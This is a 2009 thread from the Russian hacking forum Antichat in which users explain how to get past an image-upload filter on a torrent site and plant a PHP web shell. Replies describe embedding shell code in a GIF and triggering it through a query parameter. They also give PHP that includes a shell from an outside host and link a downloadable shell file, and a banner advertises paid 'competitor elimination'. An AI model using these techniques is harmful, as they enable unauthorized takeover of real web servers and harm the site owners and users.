Нужно залить shell через картинку

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > ОФФТОП > Болталка
Нужно залить shell через картинку

Страница 1 из 3

Опции темы

Поиск в этой теме

Опции просмотра

Нужно залить shell через картинку

04.05.2009, 19:23

S0ulVortex

Участник форума

Регистрация: 18.11.2007

Сообщений: 184

С нами: 9725544

Репутация: 246

Нужно залить shell через картинку

Есть торрент в нем есть заливка картинок.
Могу залить картинку и сделать её не jpeg а php.
При заливке простой картинки все нормально и в пхп сохраняет. Вот ниже если поменять jpg на php то на сервер он зальёт как php.

Код:

-----------------------------220022761016327\r\nContent-Disposition: form-data; name="file"; 
\nContent-Disposition: form-data; name="file"; filename="1.jpg"\r\nContent-Type: 
и там дальше  исходник картинки.

А вот когда шелл сохраняем в формате jpg и пытаюсь залить он не заливает.

Вобщем кто знает как обойти фильтр.
Все делается через post запрос.
Или скинте картинку с шелом

𝕏 Twitter Reddit Telegram Копировать ссылку

04.05.2009, 20:41

Grey

Познавший АНТИЧАТ

Регистрация: 10.06.2006

Сообщений: 1,113

С нами: 10483586

Репутация: 5826

Состряпай в пейнте картинку 1 на 1.
Открой её фаром и на новой строке впиши код шелла (какой нидь не большой типа выполнялки команд).

К примеру гифка: http://rapidshare.com/files/229115118/m.gif.html
?ev=phpinfo();

Последний раз редактировалось Grey; 05.05.2009 в 01:05..

04.05.2009, 23:01

S0ulVortex

Участник форума

Регистрация: 18.11.2007

Сообщений: 184

С нами: 9725544

Репутация: 246

да все супер залил но теперь при заходе на эту страницу вылетает такое.

04.05.2009, 23:21

m0Hze

Он хакер.

Регистрация: 01.11.2008

Сообщений: 1,756

С нами: 9223466

Репутация: 3171

Ну так,ты напиши код в конце картинки нужный, и заливай.
Например в конце допиши:
<?
if(isset($_GET['shell'])){
include('http://mysite.com/shel.txt');
}
?>
И обратись к шеллу, http://torent.ru/img/gif.php?shell

04.05.2009, 23:23

Grey

Познавший АНТИЧАТ

Регистрация: 10.06.2006

Сообщений: 1,113

С нами: 10483586

Репутация: 5826

Цитата:

Сообщение от S0ulVortex

да все супер залил но теперь при заходе на эту страницу вылетает такое.

Всё правильно, так и будет вылезать, но код при этом будет выполняться, а все остальное будет отображаться как html.

Если юзал мою картинку, то выполняй код так:

gif.php?ev=phpinfo();

09.05.2009, 10:41

2fed

Познающий

Регистрация: 26.03.2008

Сообщений: 31

С нами: 9539749

Репутация: 21

ну вот у меня трабл тоже самое я могу ... но на фотку твою добавил р57 не сработало (

09.05.2009, 11:08

2fed

Познающий

Регистрация: 26.03.2008

Сообщений: 31

С нами: 9539749

Репутация: 21

Грей обясни.. плз

09.05.2009, 11:20

Sn@k3

Познавший АНТИЧАТ

Регистрация: 13.04.2006

Сообщений: 1,738

С нами: 10566621

Репутация: 1198

http://file-hran2006.narod.ru/shell.txt если нужен шелл, не ищи.

09.05.2009, 11:22

2fed

Познающий

Регистрация: 26.03.2008

Сообщений: 31

С нами: 9539749

Репутация: 21

мне тока кодировка фотки ( шелл есть )

#10

09.05.2009, 11:37

fl00der

Постоянный

Регистрация: 17.12.2008

Сообщений: 353

С нами: 9157119

Репутация: 74

Спасибо, много узнал, читая тему.

Страница 1 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Залить шелл через подделку http запросов, на примере ipb 1.3	SURRENDER	Уязвимости CMS / форумов	25	13.04.2005 15:37
Если папка окрытая для закачки файлов. Можно ли залить файл через приложения?	indikatdupena	Уязвимости	17	12.04.2005 20:49
Как залить шелл через PhPBB	SheFF	Уязвимости CMS / форумов	5	29.11.2004 01:25
Как залить шелл через IPB форум, при отсутствии ftp?	bbmz	Уязвимости CMS / форумов	1	26.11.2004 18:15

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход